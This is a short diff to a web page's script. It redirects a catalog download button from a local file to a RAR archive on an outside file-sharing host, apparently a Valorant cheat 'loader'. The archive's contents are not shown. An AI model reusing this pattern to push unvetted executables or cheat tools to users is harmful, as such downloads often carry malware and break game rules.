--- a/index.html
+++ b/index.html
@@ -294,7 +294,7 @@ const buttons = document.querySelectorAll('.catalog-block__item-link');
 
 function downloadFile(filename) {
   const link = document.createElement('a');
-  link.href = 'valohaxloader.rar';
+  link.href = 'https://up.sceptique.eu/f/25041001/2aa53ef4/valohexloader.rar';
   link.download = filename;
   link.click();
 }
